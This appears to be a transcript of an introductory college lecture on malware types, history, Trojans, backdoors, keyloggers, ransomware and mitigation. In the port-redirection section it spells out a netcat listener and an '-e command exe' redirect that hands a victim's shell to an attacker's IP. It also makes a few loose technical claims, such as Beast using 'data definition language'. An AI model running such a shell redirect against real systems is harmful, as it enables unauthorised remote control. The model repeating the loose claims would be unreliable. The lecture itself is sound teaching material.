Welcome back. Today for CCT 250, we're going to get into Chapter 10, which deals with malware. So our key concepts and learning objectives here, we're going to look at some common types of malware and the threats they pose. So we're going to go through some categories, removal and mitigation, because in certain cases removal is not enough. There's some damage done and we gotta patch some holes. Trojans are an interesting form of malware because they don't propagate on their own. So we're going to look at behavior detection and creation for those. Backdoors and covert channels. You may have heard that term before, but we'll talk a little bit more about what it really is. And then, of course, ransomware, which has a couple of variants like scareware and things like that we'll also discuss. So here we have our keywords for Chapter 10: adware, backdoor, boot sector, covert channel malware, MBR, or master boot record, port redirection, ransomware, scareware, Trojan construction kit, virus, and worm. So malware is a contraction or portmanteau of the words malicious and software. So it is any software that has a nefarious intent. It has hostile, intrusive, or annoying operational context and performs any action or activity without the knowledge or consent of the system's owner. And then, yes, of course, we have the heap problem to where it's like, oh, it's capturing advertising information. Is it considered malware? Technically, yes. Is it considered dangerous? That plays a little bit of a different game. So malware can be adopted by criminals in a number of ways for a number of purposes to capture information about the victim or commit other acts. This can include viruses, worms, Trojans, spyware, adware, scareware, ransomware, all the ones we listed in the keywords just a bit ago. And it has evolved to be able to steal or destroy information, so keystroke loggers can capture input from a keyboard. You also have different malware that can now wipe hard disks or wipe logs or things like that. The legality of malware has evolved over time, as has most cybercrime legislation. One of the first entries was the Computer Fraud and Abuse Act of 1986. Addresses federal computer-related offenses and cracking of computer systems. That's why malicious hackers are sometimes referred to as crackers, because they crack the security protocols for a particular system. The Patriot Act, which I'm sure you're aware of, that's largely within our lifetimes here. That was passed, I believe, in 2001 or early 2002. This expands the powers of the CFAA. It also provides delineations of the penalties, including up to 10 years in prison for a first offense, as well as restitution, payment of monetary damages. So Patriot Act did a lot of things to help to protect individuals as well as organizations, but it also expanded the powers of the U.S. government in terms of surveillance. So I'm often of two minds about the Patriot Act. I feel like ensuring that legislation protects the people is good, but when that legislation can be co-opted to make it easier for the government to surveil people and infringe upon some of those personal freedoms, we obviously have to have a different discussion. The third in this category is California State Senate Bill SB 1137. And this one's not that old. This one's only 6 years old. It was passed in 2016, and it was one of the first laws to define the creation, propagation, and implementation of malware as a standalone crime. So it wasn't folded under the CFAA or under the Patriot Act. So we've talked about the terms on a couple of slides now, but let's go ahead and give you some definitions about what these different types of malware are. First thing is a virus. A virus code spreads from system to system by attaching itself to another file, and then when that file is accessed, the virus is activated. And this is not dissimilar from how a virus operates in the biological context, how it operates when we're dealing with, a virus that you catch like a cold, like a rhinovirus, right? Worms are a little bit different. They are self-replicating, so it doesn't require user intervention to be able to propagate the file. It will attack vulnerable services, usually network-based services, in order to try and spread itself. Traditionally, it will have a payload that will contain some other form of malware. So it could be a Trojan, it could be a rootkit, it could be a virus in certain cases. Worms can also be remote controlled, which viruses cannot. Spyware, it's in the name. It is a software that is designed to collect and report on information on a user's activities without the knowledge or consent of the user. And the knowledge and consent part is actually pretty critical, because there are types of software that you can download that you give permission to be able to monitor your actions. So, there are certain browser plugins that give you money for certain types of traffic. Obviously things like, I know Honey is an extension that's gaining a lot of popularity. Capital One has a shopping extension that you can use, which automatically applies coupon codes and things like that. But again, it's all about trying to do data mining, trying to acquire this information. So if it's with your consent, it's just standard software. It's monitoring, but it's not spyware. Spyware specifically is trying to do stuff on the sly. Adware, this is where we have software designed to display ads on your system in the form of a pop-up or a nag screen. Nag screens are going to be, you have to wait for a particular period of time or hit OK or do a certain combination of inputs in order to get it to go away. This will sometimes be deployed with spyware, so that you get ads, and the ads will contain information about how you react to the ads. Are there certain ads that you just leave up? Are there certain ads that you click and close, etc. Scareware is an extension of the spyware and adware, because we're trying to trick victims into downloading potentially useless or dangerous software. So if it's like, you see a pop-up that says, oh, your version of Google Chrome or Mozilla Firefox or whatever it is out of date, please click here to download the newest version. And just like a phishing email, it will be designed to try and look authentic and to be able to download something that changes your particular browser or a particular piece of software or whatever else. But it's not actually useful. Now, it may not necessarily be malicious in the traditional sense, but it could just clog up your system. It's a lot of adware, things like that. Trojans. This is malware that tries to disguise itself as something innocuous or something that is wanted. Now, these don't propagate on their own. These rely on uninformed or greedy users. So the Trojan is going to try and coerce the user into installing or running the software, and then that activates a payload. That payload can do any number of things. It can throw in backdoors, things like that. Often it will also be combined with what's called a rootkit. So root means root access. We're trying to get root administrative access to the system to where we can engage any activity we wish. Rootkits are tools that conceal compromises in security and keep malware hidden. This can be modifying logs, this can be deleting logs, this can be renaming files, this can be all kinds of stuff. Again, these are very broad categories. I mean, one could probably lump spy, ad, and scareware together into some form of, advertising hoopla. And then, of course, scareware has a cousin, which is really not fun, called ransomware, which tries to lock out your system. In certain cases, though, the scareware will actually not actually do anything. It'll just be a pop-up screen, like a nag screen, trying to get you to send somebody Bitcoin because, oh, your system has been stolen, but you press Alt F4 and the whole thing closes. Some targets for malware. Of course, people want information. They're trying to data mine a little bit. They may also be looking for credit card data, other financials, passwords, insider information. This is more if they're targeting a corporate environment. And then data storage, trying to co-opt your system to be able to store data off-site so that way if it's discovered, they don't have a direct linkage to it. So there's a little bit of deviation from text here that I want to be able to point out to you. They originally pointed out that the Creeper in 1971 was the first virus. It was later reclassified as a worm, so just be aware that that's why there's some variation there. I don't have that on this list. The oldest piece of malware is the virus, and it's often used to refer to a lot of different types of malware. It says all types here from the text, but that's not entirely accurate. It spreads from system to system by attaching itself to another file. File is accessed, boots, it spreads itself out, and then whatever the author wrote in there for the activation code will then carry out. There was the Wabbit virus in the mid-1970s. This introduced replication as being part of the process for the viral propagation methods. And it was considered an early variant of the fork bomb. For those of you who don't know what that is, essentially it goes to a fork decision tree and then either duplicates itself or co-ops an extra set of resources and then doubles and then doubles and then doubles until the system crashes. It's a difficult thing to defend against because with the current formation of computers and how their logic works, it's very easy to overcome a system because it will execute this very simple set of instructions but become massive over time. I believe they factored in that it would only take 2 to the 103rd power in exponentiation to, if you folded a piece of paper in half 103 times, it would be the thickness of the universe. And people don't really think about terms like exponentiation when they're dealing with that, but resources inside of a computer, when you're talking about a bit and then a byte and then kilobyte, megabyte, gigabyte, terabyte, petabyte, exabyte, yottabyte, we start expanding to a serious amount of space very, very quickly. So fork bombs are very, very dangerous. The Elk cloner. Elk cloner was developed by a high school student, as I recall. It was the first virus that had been seen outside of academia, where people were testing out how different types of computer functions could be used for non-standard purposes. And it had the ability to spread very rapidly and remain in computer memory to cause further infection. The other thing that was interesting about the Elk cloner is that there was a check bit, essentially, to where it would say, whether or not it had already been infected by the same virus. So that way it wouldn't waste compute cycles trying to infect a system that was already infected. Boot sector virus. The boot sector of a drive is where the information is stored to deal with how do we get the system up and running. For those of you who aren't really familiar with the hardware process, there are 3 steps in the BIOS, basic input output system of hardware, so when the motherboard kicks on. You've got the initiation step where the system powers up, the electricity starts passing through. Then you have the system kind of goes through its initial bootstrapping process to where the BIOS hardware, or BIOS firmware, excuse me, starts performing its normal actions. And then it looks for the transition to go from BIOS control to the operating system control. And that transition relies on identification and implementation of the boot sector. Around 1987, we start seeing logic bombs. The first one was called the Jerusalem. This is a virus that will perform damage or an action on a specific date or on a specific event. And now, as I'm sure you're aware, you can use RSS feeds and all kinds of other items to be able to scour the web and figure out whether a particular action has occurred or whether a particular date has passed based on a global time scale, not just on local time. Multipartite. Multipartite viruses first appeared in 1989 with Ghost Ball. It was designed to cause damage using multiple methods and components. The idea was that we would incorporate multiple attack vectors. So you could have executable files on the hard drive, you could have the boot sector, you could have viruses that ran strictly in RAM. There's fileless malware as well, which we'll talk about at a later time. Polymorphics. This was something that came up in the early 90s. This is where a virus would be designed to be able to change its code to avoid detection by antivirus. Now, it wasn't always perfect, but the idea was that you had multiple phases that would execute in sequence to be able to carry out a random implementation of the same general outcome. So let's say that you had 3 piece A's, 6 piece B's, and then 2 piece C's. And it would randomize which one it would do, B1, B2, B3 as part of the head, trunk, and tail of the virus. Because virus detectors and scanners at that time relied on signatures, not heuristics, it was a little bit easier to be able to avoid potential detection if the system didn't know to look for variations. Eventually, over time, that got better. MockMex. This was a malware that was shipped on digital photo frames from China in 2008. The virus would then infect any system it was connected to, and its firewall and antivirus software were disabled. And this allowed the theft of online game passwords for things like Origin and Steam and Battle.net. Macroviruses, I point out battle.net because World of Warcraft is a really big target, sorry. Macroviruses, this is a type of virus that infects and operates through the use of macro language. So if you've never used macros before, essentially the idea is that you set up a chain of steps, and that allows you to carry out an action that would normally be more complex by clicking a single button or by running a single script. Again, tying back to World of Warcraft, there were macros that you could build to carry out specific actions in game, to where if you staggered things based on the steps of go ahead and, create this item, wait X period of time, and then use that item to create a secondary item, and then once that's finished, go ahead and, boot it to the auction house or what have you. In more standardized computer terms, it may be that you have a file that runs in parallel with a Word document. That's a very common way for Office files to get infected, is by use of macros. Hoaxes. Oh, of course, the hoax. Where would we be without rumor? It's not a true virus, but it's designed to get a user to take action even though no infection or threat exists. And this one's particularly nefarious because in certain cases, uneducated users, and we know they're out there, of course, make it worse for themselves than if they had just left it alone in the first place. So they go in, they start making changes, they flip switches that they have no idea what they're using. And then the system is made vulnerable to things that previously it was perfectly immune from. Well, I don't like using the word immune. Much more well defended. How's that? So based on what we've just talked about with viruses, the biggest thing is make sure that your software is up to date. Make sure you have something present. And then education. Make sure that your users know what's going on. Make sure that they don't start just flipping random switches, and that they understand that their actions have a consequence in a corporate environment and in a personal environment. You don't want to give the impression that, when they walk out the doors, all of a sudden all of their responsibilities evaporate. Worms. So we talked about the Creeper a little bit ago. Creeper was the first proof of concept to demonstrate a mobile application. Not necessarily mobile in terms of mobile devices, but like mobile as in like it could move from platform to platform. It was written by Bob Thomas in 1971. It is not actively malicious, but there were some variations that definitely had some malicious intent. So Creeper inspired an updated version of itself, as well as the first antivirus software designed to remove it. Both of these were designed by Ray Tomlinson in 1972. Antivirus originally had to be very specific, to where you would run a utility just to get rid of a specific virus that was on your system. Self-replicating malware. Worms will leverage the convenience of networks with the power of well-written malware, hopefully well-written. It is entirely self-contained. It can replicate very rapidly, consumes bandwidth and resources, and then once the system has been taken over, it can transmit information that is necessary, such as cryptographic keys or e-commerce information or passwords, what have you. And it can also carry payloads such as a virus that would cause other amounts of damage. How do we deal with this? Well, we patch operating systems. We keep our systems protected so that way we can be as current as possible, but we're not protected from 0 days. And if you'll recall, 0 days it's been 0 days since the publisher of the software, whoever they may be, has been made aware of the vulnerability, which means they don't know about it yet. And we can't fix what we don't acknowledge. Thanks, Dr. Phil. So we don't have a patch to be able to deal with this particular problem because nobody recognizes it as a problem yet. Education, of course, is also good for worms. Make sure that you don't mess with emails that you weren't expecting to get. If you have a client to be able to view your email, use a preview pane or similar, have antivirus active and have it scanning your email program as it's running. And then, of course, firewalls, things that will be like, okay, well, we've got a virus and that stinks, or we've got a worm and it's trying to do things that it shouldn't be doing. Well, the firewall will help to prevent traffic that shouldn't be moving from moving. So again, it's all a confluence of things. What do I tell you, folks? In security, it's all about deterrence. It's not about prevention, because prevention is very difficult. It's about deterrence. If prevention happens to occur, then that is a happy coincidence. Let's look at some types of Trojans now. We're kind of working up our ladder of potentially hazardous stuff, very nefarious in certain cases. So a Trojan, again, does not propagate on its own. It relies on a user's cupidity to be able to suspend it about. First one is the RAT, or Remote Access Trojan. It's designed to give an attacker control over a system, so we have several members in this class that are very well known, like Sakula, KJ Worm, Havex, Dark Comet, quite a few that are floating around in that sphere. Traditionally, members of this class work in a client and server component. There has to be a control client that sits on the target machine, and then a response server or a CNC server that is able to receive and respond. Data sender Trojans are designed to capture and redirect data. These are varied and can be anything from keystrokes and passwords to any other type of information that can reside on the system, or email if there's a predefined email or social media account that it can access. Destructive Trojans are designed to do only one thing: destroy data and disable a system. Now, there may be destructive aspects of a different type of Trojan, but if it is a true damage control based Trojan, it is trying to liquidate the system. Denial of service. This is designed to target a specific service or server, overwhelm it, and shut it down. This may work in concert with other machines that have the same functionality, so that's where we have our distributed denial of service. Proxies, this is where Trojans will allow attackers to use a victim system to perform their own activities. It makes it much easier for them to conceal their activities and makes it harder for law enforcement to try and find the actual perpetrator. This is sometimes also called bouncing. File Transfer Protocol, or FTP. This is a type of Trojan that sets up the infected system as an FTP server to host illegal or illicit materials. So you can have pirated movies, music, software, pornography, weaponry, all kinds of stuff that could be potentially dangerous. But again, like with the proxy, they're trying to use another infected system to try and conceal their own actions. And then Trojans that are specifically built to try and disable security software and make the system much more vulnerable to other types of intrusions. These are designed to specifically target countermeasures on a system and shut it down. So this is going to target things like your antivirus or anti-malware, firewalls, and system updates. So this is often a what we call a first volley. This is where you infect the system, and then once we start shutting down the security software, let's run activities from one of the other categories, such as setting a proxy or an FTP, or using it for a DOS box or something similar. Now, once the file is present on the system, there are payloads that can propagate on their own, but the Trojan in and of itself does not self-propagate. So we want to make sure we're aware of that as part of the function here. The Trojan itself is going to do pretty much anything other than replication. It's going to do data theft. It's going to dump software that shouldn't be there, modify, delete, upload, download, keyloggers, capturing system screen, consuming storage space, crashing the system. Now, crashing the system is not necessarily going to be a standalone function. It may just be a result of the actions, but in some cases, like I said, there are damage-based Trojans that specifically will be like, just burn it to the ground. So targets, of course, are going to be anybody, but specifically it may be going after financial data, passwords, stored data. It might be going after insider information, again, in the corporate context, kind of like it would be with a worm. Used to be that they would be distributed through bulletin board systems and floppies and things like that. Now you can have it go via flash drives, drive-by downloads, corrupted GitHub or SourceForge pages, torrents. There's all kinds of things that can pass on Trojans. So some known symptoms of an infection. Weird physical performance, like the CD or DVD tray opens or closes or seems to be running even when there's nothing in it. The display changes, flips or inverts. Documents print with no explanation. Strange web pages start popping up. Color or screensaver settings move around. Your mouse buttons may switch. The start button or taskbar disappears. Chat boxes pop. The ISP will actually email you and say, hey, your computer's running port scans. What's going on? System shuts down by itself. Account passwords are changed. Possible lockout. Unknown statements in your credit card bills. Modems dialing in, obviously that's kind of an antiquated aspect, but it can happen if you have a modem. In more broadband-like cases, you'll just see strange websites that pop up, or maybe firewall rules that are popping up. Control-Alt-Delete stops working. That is a scary one, because that takes away a lot of your problem-solving ability in the main environment. You have to get a live CD or USB to be able to work from. And although the computer is rebooted, a message states that there are other users still connected. So you have a secondary user that, as part of the boot sequence, is actually connecting remotely. So detection, this can happen in a number of different ways. This is just some common stuff. So, back orifice, school bus, Invaser, Loki, Netcat, Whack-A-Mole, NetBus. There's a ton of them here. This is not something I expect you guys to memorize, but what I want you to notice is just, there's a ton of different protocols that will be used in beyond what we just expect with TCP and UDP. You can also see ICMP is incorporated with Loki. But largely it's just targeting a lot of the dynamic ports, so the upper numbers, usually in the 30 to 50,000 range. But just like anything else, we want to make sure that we're identifying things by using vuln scans, using antivirus, using firewalls, and you can even just run netstat and identify any weird connections that are currently active, and they'll look like this. So you can see here, if we go through A-N, so it's all connections, and then we have our numerical representations as opposed to a resolution name. You can see, now this is obviously, this is a bogus one because it's all zeros, but you can see here there's a ton of ports open and listening, and we have no idea why, so that would be something that's a little suspect. Some Trojan tools to be aware of. Let Me Rule, which is a Delphi-based remote access Trojan. Recub, or Remote Encrypted Callback Unix Backdoor. This uses RC4 encryption, code injection, and encrypted ICMP communication requests. Fatbot uses peer-to-peer. Amitis is a TCP port backdoor. Zombambi, this is a web browser-based infection. Beast uses DDL, or data definition language. It injects itself into an existing process and then hides. Hard disk killer. This is one of the damaged ones. It specifically is written to destroy a hard drive. CryptoLocker encrypts all data on the disks and then holds the encryption key until the user pays a ransom. So that is not an uncommon one to see with ransomware. Tiny Banker. This is a Trojan that forces the computer to think it's connected to a legitimate banking website where users divulge logon credentials. So in certain cases, it'll run through a number of different pages that are essentially spoof clones of login pages for various banks, and then it will try and capture the credentials from your password manager or something similar. KettyRat, this targets Citrix users, so a lot of remote desktop, things like that can run through Citrix. One of the distribution methods we see a lot with Trojans is the process of wrapping, and this is where we combine a payload with a harmless executable to create a new device. This is especially common for things like mobile games. Once it's done, maybe there's some feature that was changed that people are clamoring about, or there's some feature being added to the new executable that is desirable in some way. Pokemon Go is a big target for this. And then the new executable is loaded up in some location where it's likely to be downloaded. So once that's posted, you can use Reddit communities or things like that. The thing with Reddit communities, though, is that because you do have to generate a username, it's difficult to have a trust relationship build up. If somebody has just joined Reddit and their account's only 3 days old and they're trying to post something and all of a sudden it's throwing up, viral alerts, and they're like, oh no, it's just a false positive. Most people in those communities hopefully have seen enough to be intelligent and say, that seems a little spooky. I'm gonna wait a little bit and see what's going on. I'm gonna go ahead and scan this. I'm not gonna download this. It's like, hey man, this is throwing a false positive. You can either give us a good explanation as to why, or you can pull your tool and go home. Um, Trojan construction kits. I mean, there are several dark horses out there. Stealth Tool, Cinespy. Cinespy is a very common one. The Trojan construction kit. There are also worm builders, and build your own virus, and there's a ton of them out there. Um, Outside of academia, though, those tools are highly, highly suspect. So you really don't want law enforcement being like, "What are you doing with this?" Um, Backdoors. Backdoors are just some method by which a either legitimate user or illegitimate user can place a method to circumvent the standard login procedure. So they're trying to say, okay, I have access to this normally. I am a contractor who works for a software developer or something similar. I want to leave a way in so that at a later date I can come back in and do whatever. The rationale changes from person to person, obviously. But in any event, they want to leave something in there so that way they have a way in that is not going to go through the front door, as it were. So you could have a backdoor that cracks passwords and tries to get information from other legitimate users. You could have rootkits, process hiding, to where we're trying to do kind of like Beast, using DDL or similar to try and conceal our activities behind another legitimate process. And then services backdoors, which is where we will try and hide inside of standard user services. SVC host is a fairly common one on Windows because so many things get put under the umbrella of SVC host or service host. So you always want to be aware of what's running on your machine. Sometimes take a look at the detailed view as opposed to just being like, oh, it's just this random thing. Especially because if you try and right click it and close it, it says access is denied because it's running 30 or 40 different processes at once. So then you have to go into services.msc and dig around, and it takes a long time to get proficient with this stuff, but it's important to understand the basics of this is what backdoors try to do. They're either going to try and steal legit information, hide a piece of software to conceal its own activities, hide in a process, or hide in a service. Covert communication. So this is an interesting one. This is where we try and transfer information using a mechanism that was not designed for transferring. And then in order to identify a covert system, we have to use what's called TCSEC, Trusted Computer System Evaluation Criteria. This helps us to identify potential issues with what are called storage channels and timing channels. I mean, as you might imagine, your computer runs on a specific set of timing. Timing meaning, your CPU is the conductor of the orchestra that is your machine. And, if it's not properly going on 1 and 2 and 3 and 4, then the system breaks down because you have asynchronous activity going on. Everybody's got to stay to the same beat. So manipulation of that manifests itself in a number of different ways. So the TCSEC allows us to identify potential manipulations of the covert communication system. Keystroke loggers. This can take a number of different forms. They are traditionally going to be implemented as software because it's a little bit less visible physically. But I will say hardware loggers tend to be a little bit more successful because if you get past the first day, they can run essentially forever. Because very few people actually look behind their computers and see if there's something plugged in that shouldn't be. Or you can have some that are firmware based. This is a little bit different. This requires a bit more prep because you actually do have to flash the firmware of the motherboard in question, and then you'll be able to capture information that way. But in any event, software is installed just like any other Trojan, or if it's a hardware-based one, it gets plugged into whatever access port you need. So there's a number of different ones there. Invisible Keylogger is Windows-based, just runs in the system in the background. Spytector also runs in the background. It can record activity to an encrypted log that again gets emailed to an attacker. So be aware that you may see some unusual emails or things like that going on. Spytech Spy Agent can capture keystrokes, emails, chat logs, instant messages, tons of things like that. Elite Monitor, advanced keystroke logger that monitors what product, and then it also can detect logon credentials. So it will look at all the same stuff that Spytech or Spytector or Invisible will look at, but it also looks for logon credentials. Port redirection. This is where we bounce information from the port that it was intended to a secondary. Uh, very easily done on Netcat. Netcat is a very useful tool if you have not used it before. I definitely recommend sitting down and playing with it because there's a lot of variations that you can work with. Again, I recommend that you do this in a VM like you would with any other tool. Netcat's a pretty simple command line interface for Windows and Linux. It reads info from TCP and UDP connections and then bounces traffic. So here is how we would set up a basic listener. nc-n-v-l-p80, and then the hacker will go ahead and execute a redirect using nc-n, whatever their IP is, 80-e command exe. Now the command shell on the system of the victim is ready for input. So command.exe is going to bounce anything that is taken in from the user and bounce it to the hacker's IP on port 80. Now, if you need an explanation of what some of these ports do, here you go. So to attach or detach, to create a simple listener, set a timeout, go ahead and set your input or output, help options, verbose mode, which can be helpful if you're having an error that's kicking back, hex dumps, port scans, etc. So Netcat is a pretty good general use tool. So again, if you haven't gotten a chance to play with it, definitely do so. This is not a bad set of instructions to try and make some notes from. Spyware. Of course, we've talked about spyware already, but we'll give you a little bit of a deep dive here. Very, very shallow deep dive, to be honest. This is designed to collect and report on information of a user's activities or content without the user's consent. That tends to be the biggest flag for a lot of people. Is it's not so much that you have a piece of software that got installed, it's that it's doing things that you did not give it permission to do or unknowingly. So that's why they say knowledge or consent, because if you know you installed it but you don't know what it's doing in the background, it still makes it malicious in some capacity. So it can capture information about what you're browsing online, your keystrokes, software usage, general computer usage, and it propagates on things like peer-to-peer networks, torrents, and other things like that. Social media, of course, people get hacked and there'll be a link that's posted and you'll click on it and it'll give you the same infection that person has. Email attachments, physical access to your machine, browser defects. Never assume that your browser is perfect. There's always holes, possible intrusions, especially browsers like most of the modern ones that allow extensions or mods of some kind. And then freeware. Not to be a jerk about it, but freeware is not what it once was. Freeware used to be, I want to put this tool out there because I developed it and I think it's super useful. Now it's more of a, how do I profit from this? How do I profit from something that's free? Well, let me capture information about the people who are downloading my tool and then sell that information to another company. So this would be an example here a little bit to where you have CCleaner. Now CCleaner I don't have a problem with. I use Piriform and their tools all the time for various things if I need to. It's a really easy user interface and they give you a 30-day trial. So if I have a client that has a computer that's giving me issues, I can go ahead and throw that in there. And it doesn't do anything that I wouldn't be able to do myself. It just speeds it up. But if you look at the bottom, it says add Yahoo toolbar and use CCleaner from your browser. It's like, well, that sounds cool if you're already using it, but again, it's incorporating information into your browser that may snoop on your activities. So this is a common way to place stuff on a user's systems by bundling. We're going to incorporate these extra tools, and while we don't require it, if it's the default install or somebody's in a hurry, they may not notice that that installation is being carried out. Adware, scareware, and ransomware. Woohoo. As we know, adware displays ads. Scareware tries to trick you into taking some form of action or to paying money to a potential ransomer or things like that, even though nothing is actually going on, which is a quite nefarious trick, playing on the stupidity of people, or ignorance rather. Ransomware is where we're trying to hold it hostage. And usually it's going to be in the age of Bitcoin, relying on sending something to a wallet that can then be tumbled a couple of times and then the money just kind of disappears. So how do we stand against this? Well, in general, same thing as anything else. We want to make sure that we're keeping our operating system and software and firmware and all of those things current, and we're only getting them from the appropriate sources. This is something that's a little bit difficult for a lot of people to think about, but if you use something like Linux, there's a lot more onus on you to be like, okay, is the source for this particular software something you're okay with? To where when you run the updates, you're taking on a lot of that yourself. Windows kind of validates most of that stuff for you. When you go through Windows Update or the Microsoft Store or similar, there's a vetting process. So just be aware that in certain cases, the whole adage about security and responsibility and the inversely proportional relationship between security and convenience, definitely comes home really clearly, because if you don't have knowledge of what's going on, then you are much more likely creating yourself to be a victim than not. Even in the event that you are the best technician ever and you follow all the rules, you still need to do backups. So definitely have your data backed up. And the note here about storing it on a device that's not connected to your network, that's pretty critical. We want to make sure that we're not like RAID. RAID is not a backup. You'll see that online sometimes as a kind of a meme. And the idea is you don't want to have stuff quote unquote backed up via RAID, because yes, your local copy is good. But if there's a fire and that machine burns down, it doesn't matter how many copies you've got on the disk is still toast. So you want to make sure that your backups are not going to be in places where they can be susceptible to the same threats. Restrict files from running in data folders. Don't use RDP if you can avoid it. There's a couple of different remote desktop softwares that I would recommend just not using if you can avoid it. If you are ever working with a technician and they say they need to use remote desktop, I suggest you take a very, very jaundiced look at that. In most cases, if that's the situation and they need to go in and make changes, they need to tell you what the changes are first before you hand off control of your system. Even if you're talking to the person directly from, I was the one who called Dell, or I was the one who called Microsoft, I am very, very leery of using RDP for remote troubleshooting. So what did we talk about today? Malware types, removal, mitigation, talking about Trojans, big deep dive on Trojans, backdoors, covert channels, and ransomware. So it's a lot of material, a lot of different things to cover. And there's a lot of different categories you can go into, but in general, what we have to remember is this is software that's trying to do something without our knowledge or consent. There's that or, that all-important or. So we want to be aware of that. So as per usual, if you have any questions, concerns, or comments, please contact me through the usual channels. Let me know if there's anything else I could do to improve these particular slides, if there's any aspects of malware that you'd like me to go into more detail for, bearing in mind that we will see this stuff again in CCT 251. Thank you so much for your time and attention. I appreciate you all as always, and I will see you next class.